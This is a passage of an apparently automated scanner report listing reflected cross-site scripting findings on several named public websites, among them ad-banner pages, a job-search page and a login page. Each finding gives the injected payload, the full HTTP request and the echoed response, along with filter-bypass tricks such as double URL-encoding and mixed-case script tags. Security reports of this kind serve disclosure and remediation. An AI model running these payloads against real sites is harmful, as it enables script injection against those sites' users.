6.17. http://img.mediaplex.com/content/0/10599/62036/69810_in_sb_fy12q1w5_banner_vostro3500_728x90.html [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/10599/62036/69810_in_sb_fy12q1w5_banner_vostro3500_728x90.html

Issue detail

The value of the mpck request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8471"><script>alert(1)</script>8efa1b7e398 was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/10599/62036/69810_in_sb_fy12q1w5_banner_vostro3500_728x90.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10599-62036-39186-0%3Fmpt%3D%5BCACHEBUSTER%5Dc8471"><script>alert(1)</script>8efa1b7e398&mpt=[CACHEBUSTER]&mpvc= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.vccircle.com/500/news/intel-capital-puts-18m-in-new-follow-on-investments
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo3=13754:29158

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 18:04:29 GMT
Server: Apache
Last-Modified: Thu, 31 Mar 2011 06:21:21 GMT
ETag: "511ce3-10ce-49fc14d495a40"
Accept-Ranges: bytes
Content-Length: 4803
Content-Type: text/html; charset=ISO-8859-1

<html>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<noscript><a href="http://altfarm.mediaplex.com/ad/ck/10599-62036-39186-0?mpt=[CACHEBUSTER]c8471"><script>alert(1)</script>8efa1b7e398" target="_blank">
...[SNIP]...

6.18. http://img.mediaplex.com/content/0/10599/62036/69810_in_sb_fy12q1w5_banner_vostro3500_728x90.html [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/10599/62036/69810_in_sb_fy12q1w5_banner_vostro3500_728x90.html

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 554f8"-alert(1)-"ed0fb0a8d66 was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/10599/62036/69810_in_sb_fy12q1w5_banner_vostro3500_728x90.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10599-62036-39186-0%3Fmpt%3D%5BCACHEBUSTER%5D554f8"-alert(1)-"ed0fb0a8d66&mpt=[CACHEBUSTER]&mpvc= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.vccircle.com/500/news/intel-capital-puts-18m-in-new-follow-on-investments
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo3=13754:29158

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 18:04:29 GMT
Server: Apache
Last-Modified: Thu, 31 Mar 2011 06:21:21 GMT
ETag: "511ce3-10ce-49fc14d495a40"
Accept-Ranges: bytes
Content-Length: 4728
Content-Type: text/html; charset=ISO-8859-1

<html>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<noscript><a href="http://altfarm.mediaplex.com/ad/ck/10599-62036-39186-0?mpt=[CACHEBUSTER]554f8"-alert(1)-"ed0fb0a8d66" t
...[SNIP]...
<mpcke/>';
if (mpcke == 1) {
   mpcclick = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F10599-62036-39186-0%3Fmpt%3D%5BCACHEBUSTER%5D554f8"-alert(1)-"ed0fb0a8d66");
   mpck = "http://" + mpcclick;
}
else if (mpcke == 2) {
   mpcclick2 = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F10599-62036-39186-0%3Fmpt%3D%5BCACHEBUSTER%5D554f8"-alert(1)-"ed0fb0a8d
...[SNIP]...

6.19. http://img.mediaplex.com/content/0/10599/62036/69810_in_sb_fy12q1w5_banner_vostro3500_728x90.html [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/10599/62036/69810_in_sb_fy12q1w5_banner_vostro3500_728x90.html

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 13a63'%3balert(1)//5d8d633e097 was submitted in the mpck parameter. This input was echoed as 13a63';alert(1)//5d8d633e097 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/10599/62036/69810_in_sb_fy12q1w5_banner_vostro3500_728x90.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10599-62036-39186-0%3Fmpt%3D%5BCACHEBUSTER%5D13a63'%3balert(1)//5d8d633e097&mpt=[CACHEBUSTER]&mpvc= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.vccircle.com/500/news/intel-capital-puts-18m-in-new-follow-on-investments
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo3=13754:29158

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 18:04:29 GMT
Server: Apache
Last-Modified: Thu, 31 Mar 2011 06:21:21 GMT
ETag: "511ce3-10ce-49fc14d495a40"
Accept-Ranges: bytes
Content-Length: 4734
Content-Type: text/html; charset=ISO-8859-1

<html>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<noscript><a href="http://altfarm.mediaplex.com/ad/ck/10599-62036-39186-0?mpt=[CACHEBUSTER]13a63';alert(1)//5d8d633e097" t
...[SNIP]...
<a href="http://altfarm.mediaplex.com/ad/ck/10599-62036-39186-0?mpt=[CACHEBUSTER]13a63';alert(1)//5d8d633e097" target="_blank">
...[SNIP]...

6.20. http://img.mediaplex.com/content/0/10599/62036/69810_in_sb_fy12q1w5_banner_vostro3500_728x90.html [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/10599/62036/69810_in_sb_fy12q1w5_banner_vostro3500_728x90.html

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bd893'%3balert(1)//85277f53b6c was submitted in the mpvc parameter. This input was echoed as bd893';alert(1)//85277f53b6c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/10599/62036/69810_in_sb_fy12q1w5_banner_vostro3500_728x90.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10599-62036-39186-0%3Fmpt%3D%5BCACHEBUSTER%5D&mpt=[CACHEBUSTER]&mpvc=bd893'%3balert(1)//85277f53b6c HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.vccircle.com/500/news/intel-capital-puts-18m-in-new-follow-on-investments
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo3=13754:29158

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 18:04:29 GMT
Server: Apache
Last-Modified: Thu, 31 Mar 2011 06:21:21 GMT
ETag: "511ce3-10ce-49fc14d495a40"
Accept-Ranges: bytes
Content-Length: 4758
Content-Type: text/html; charset=ISO-8859-1

<html>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<noscript><a href="bd893';alert(1)//85277f53b6chttp://altfarm.mediaplex.com/ad/ck/10599-62036-39186-0?mpt=[CACHEBUSTER]" t
...[SNIP]...
<a href="bd893';alert(1)//85277f53b6chttp://altfarm.mediaplex.com/ad/ck/10599-62036-39186-0?mpt=[CACHEBUSTER]" target="_blank">
...[SNIP]...

6.21. http://img.mediaplex.com/content/0/10599/62036/69810_in_sb_fy12q1w5_banner_vostro3500_728x90.html [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/10599/62036/69810_in_sb_fy12q1w5_banner_vostro3500_728x90.html

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee9b6"%3balert(1)//e1c37021c77 was submitted in the mpvc parameter. This input was echoed as ee9b6";alert(1)//e1c37021c77 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/10599/62036/69810_in_sb_fy12q1w5_banner_vostro3500_728x90.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10599-62036-39186-0%3Fmpt%3D%5BCACHEBUSTER%5D&mpt=[CACHEBUSTER]&mpvc=ee9b6"%3balert(1)//e1c37021c77 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.vccircle.com/500/news/intel-capital-puts-18m-in-new-follow-on-investments
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo3=13754:29158

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 18:04:29 GMT
Server: Apache
Last-Modified: Thu, 31 Mar 2011 06:21:21 GMT
ETag: "511ce3-10ce-49fc14d495a40"
Accept-Ranges: bytes
Content-Length: 4758
Content-Type: text/html; charset=ISO-8859-1

<html>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<noscript><a href="ee9b6";alert(1)//e1c37021c77http://altfarm.mediaplex.com/ad/ck/10599-62036-39186-0?mpt=[CACHEBUSTER]" t
...[SNIP]...
<mpvce/>';
if (mpvce == 1) {
   mpvclick = encodeURIComponent("ee9b6";alert(1)//e1c37021c77");
   mpvc = mpvclick;
}
else if (mpvce == 2) {
   mpvclick2 = encodeURIComponent("ee9b6";alert(1)//e1c37021c77");
   mpvc = encodeURIComponent(mpvclick2);
}
else {
   mpvc = ("ee9b6"%3balert(1)//e1c3
...[SNIP]...

6.22. http://img.mediaplex.com/content/0/10599/62036/69810_in_sb_fy12q1w5_banner_vostro3500_728x90.html [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/10599/62036/69810_in_sb_fy12q1w5_banner_vostro3500_728x90.html

Issue detail

The value of the mpvc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 215cc"><script>alert(1)</script>a6809bca270 was submitted in the mpvc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/10599/62036/69810_in_sb_fy12q1w5_banner_vostro3500_728x90.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10599-62036-39186-0%3Fmpt%3D%5BCACHEBUSTER%5D&mpt=[CACHEBUSTER]&mpvc=215cc"><script>alert(1)</script>a6809bca270 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.vccircle.com/500/news/intel-capital-puts-18m-in-new-follow-on-investments
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo3=13754:29158

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 18:04:29 GMT
Server: Apache
Last-Modified: Thu, 31 Mar 2011 06:21:21 GMT
ETag: "511ce3-10ce-49fc14d495a40"
Accept-Ranges: bytes
Content-Length: 4846
Content-Type: text/html; charset=ISO-8859-1

<html>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<noscript><a href="215cc"><script>alert(1)</script>a6809bca270http://altfarm.mediaplex.com/ad/ck/10599-62036-39186-0?mpt=[CACHEBUSTER]" target="_blank">
...[SNIP]...

6.23. http://jobsearch.naukri.com/mynaukri/mn_newsmartsearch.php [xz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobsearch.naukri.com
Path:   /mynaukri/mn_newsmartsearch.php

Issue detail

The value of the xz request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6033%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522d8060b71fa2 was submitted in the xz parameter. This input was echoed as b6033"style="x:expression(alert(1))"d8060b71fa2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the xz request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /mynaukri/mn_newsmartsearch.php?xz=b6033%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522d8060b71fa2&qc=16987&tem=ibm HTTP/1.1
Host: jobsearch.naukri.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: test=naukri.com; __utma=159336229.1771676399.1305381499.1305381499.1305381499.1; __utmb=159336229; __utmc=159336229; __utmz=159336229.1305381499.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); _nkjs=0.52285400+1305381509380163

Response

HTTP/1.1 200 OK
Server: NWS/1.0. (Unix) mod_ssl/1.0. OpenSSL/0.9.8b PHP/5.2.3
X-Powered-By: PHP/5.2.3
Vary: Accept-Encoding
Content-Length: 30330
Content-Type: text/html
X-Pad: avoid browser bug
Date: Sat, 14 May 2011 13:58:37 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search Jobs in In
...[SNIP]...
<input type="hidden" name="xz" value="b6033"style="x:expression(alert(1))"d8060b71fa2">
...[SNIP]...

6.24. http://jobsearch.naukri.com/mynaukri/mn_newsmartsearch.php [xz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobsearch.naukri.com
Path:   /mynaukri/mn_newsmartsearch.php

Issue detail

The value of the xz request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3695b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e97df6177a7f was submitted in the xz parameter. This input was echoed as 3695b"><script>alert(1)</script>97df6177a7f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the xz request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /mynaukri/mn_newsmartsearch.php?xz=3695b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e97df6177a7f&qc=30982&tem=hettich HTTP/1.1
Host: jobsearch.naukri.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _nkjs=0.52285400+1305381509380163; test=naukri.com; HitsFromTieup=9902; wExp=N; TieupFromTMS=10; __utmz=266160400.1305381568.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=266160400.1737653072.1305381568.1305381568.1305381568.1; __utmc=266160400; __utmb=266160400.1.10.1305381568

Response

HTTP/1.1 200 OK
Server: NWS/1.0. (Unix) mod_ssl/1.0. OpenSSL/0.9.8b PHP/5.2.3
X-Powered-By: PHP/5.2.3
Vary: Accept-Encoding
Content-Length: 30326
Content-Type: text/html
X-Pad: avoid browser bug
Date: Sat, 14 May 2011 13:59:58 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search Jobs in In
...[SNIP]...
<input type="hidden" name="xz" value="3695b"><script>alert(1)</script>97df6177a7f">
...[SNIP]...

6.25. http://jobsearch.naukri.com/mynaukri/mn_newsmartsearch.php [xz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobsearch.naukri.com
Path:   /mynaukri/mn_newsmartsearch.php

Issue detail

The value of the xz request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f17a9%2522%253e%253cScRiPt%253ealert%25281%2529%253c%252fScRiPt%253ea313fdc1f57 was submitted in the xz parameter. This input was echoed as f17a9"><ScRiPt>alert(1)</ScRiPt>a313fdc1f57 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

There is probably no need to perform a second URL-decode of the value of the xz request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /mynaukri/mn_newsmartsearch.php?xz=f17a9%2522%253e%253cScRiPt%253ealert%25281%2529%253c%252fScRiPt%253ea313fdc1f57&sh=a HTTP/1.1
Host: jobsearch.naukri.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _nkjs=0.52285400+1305381509380163; __utmz=159336229.1305381698.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/0|utmcmd=referral; __utma=159336229.1701716958.1305381698.1305381698.1305396058.2; __utmc=159336229; test=naukri.com

Response

HTTP/1.1 200 OK
Server: NWS/1.0. (Unix) mod_ssl/1.0. OpenSSL/0.9.8b PHP/5.2.3
X-Powered-By: PHP/5.2.3
Vary: Accept-Encoding
Content-Length: 30326
Content-Type: text/html
X-Pad: avoid browser bug
Date: Sat, 14 May 2011 18:48:06 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search Jobs in In
...[SNIP]...
<input type="hidden" name="xz" value="f17a9"><ScRiPt>alert(1)</ScRiPt>a313fdc1f57">
...[SNIP]...

6.26. https://login.zoosk.com/signup.php/%22onmouseover=prompt%28980185%29%3E [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://login.zoosk.com
Path:   /signup.php/%22onmouseover=prompt%28980185%29%3E

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a36c7"><script>alert(1)</script>134a1a57907 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /signup.php/%22onmouseovera36c7"><script>alert(1)</script>134a1a57907=prompt%28980185%29%3E HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: login.zoosk.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: z_tu1=YToyOntzOjQ6Imhhc2giO3M6MzI6IjRiODkxM2I3MzA2M2U4YmMyMTQ0YTcyNzhlNGVjZGFmIjtzOjQ6ImRhdGEiO3M6MjIwOiJZVG94TWpwN2FUb3dPMDQ3Y3pveE9pSmxJanRPTzNNNk1Ub2laeUk3Y3pvek1qb2lZamc0WkdObU9EZGtabVZtWVRsaE16YzFNelU0TmpGaU5qVTBOamt4WWpRaU8zTTZNVG9pY3lJN1RqdHpPakU2SW00aU8wNDdjem94T2lKaklqdE9PM002TVRvaWRDSTdUanR6T2pJNklteGhJanRPTzNNNk1qb2liRzhpTzA0N2N6b3hPaUpwSWp0cE9qRTdjem94T2lKdklqdE9PM002TVRvaWVpSTdUanQ5Ijt9

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 16:06:40 GMT
Server: Apache
P3P: CP="CAO PSA OUR"
Expires: Thu, 11 Nov 1982 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Cache-Control: post-check=1, pre-check=2
Pragma: no-cache
Vary: Accept-Encoding
Keep-Alive: timeout=10, max=995
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 16355

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link rel="canonical" href="https://login.zoosk.com/signup.php/%22onmouseovera36c7"><script>alert(1)</script>134a1a57907=prompt%28980185%29%3E" />
...[SNIP]...

6.27. http://nmp.newsgator.com/NGBUZZ/buzz.ashx [_dsrId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nmp.newsgator.com
Path:   /NGBUZZ/buzz.ashx

Issue detail

The value of the _dsrId request parameter is copied into the HTML document as plain text between tags. The payload 896d1<script>alert(1)</script>dc531edf8f6 was submitted in the _dsrId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /NGBUZZ/buzz.ashx?load=data&apiToken=FBE4426140F444809F0B7D3A1169578F&buzzId=113828&_dsrId=ngbuzz_113828_data896d1<script>alert(1)</script>dc531edf8f6 HTTP/1.1
Host: nmp.newsgator.com
Proxy-Connection: keep-alive
Referer: http://static.reuters.com/resources/media/editorial/20080811/deals-widget.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="ALL DSP COR CUR IVDo OUR BUS UNI"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Last-Modified: Sat, 14 May 2011 17:38:55 GMT
ETag: 634409699355432074
Vary: Accept-Encoding
Content-Type: text/javascript; charset=utf-8
Content-Length: 14987
Cache-Control: public, max-age=300
Date: Sat, 14 May 2011 18:04:38 GMT
Connection: close

window.ng_scriptload({id:'ngbuzz_113828_data896d1<script>alert(1)</script>dc531edf8f6',status:200,statusText:'200 OK',response:{Data:[{Description:'FRANKFURT (Reuters) - U.S. investor Lone Star could sell part of German bank IKB to BNP Paribas but is having a hard time finding a buy
...[SNIP]...

6.28. http://nmp.newsgator.com/NGBuzz/Buzz.ashx [buzzId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nmp.newsgator.com
Path:   /NGBuzz/Buzz.ashx

Issue detail

The value of the buzzId request parameter is copied into the HTML document as plain text between tags. The payload a60c2<script>alert(1)</script>ed3cbb62fe5 was submitted in the buzzId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /NGBuzz/Buzz.ashx?buzzId=113828a60c2<script>alert(1)</script>ed3cbb62fe5&apiToken=FBE4426140F444809F0B7D3A1169578F HTTP/1.1
Host: nmp.newsgator.com
Proxy-Connection: keep-alive
Referer: http://static.reuters.com/resources/media/editorial/20080811/deals-widget.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="ALL DSP COR CUR IVDo OUR BUS UNI"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Content-Type: text/javascript; charset=utf-8
Content-Length: 102
Cache-Control: private, max-age=600
Date: Sat, 14 May 2011 18:04:24 GMT
Connection: close
Vary: Accept-Encoding

//An error occurred: Could not find Buzz item with id: 113828a60c2<script>alert(1)</script>ed3cbb62fe5

6.29. http://nmp.newsgator.com/NGBuzz/Buzz.ashx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nmp.newsgator.com
Path:   /NGBuzz/Buzz.ashx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 9a4fa%3balert(1)//6249158d994 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9a4fa;alert(1)//6249158d994 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /NGBuzz/Buzz.ashx?buzzId=113828&apiToken=FBE4426140F444809F0B7D3A1169578F&9a4fa%3balert(1)//6249158d994=1 HTTP/1.1
Host: nmp.newsgator.com
Proxy-Connection: keep-alive
Referer: http://static.reuters.com/resources/media/editorial/20080811/deals-widget.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="ALL DSP COR CUR IVDo OUR BUS UNI"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
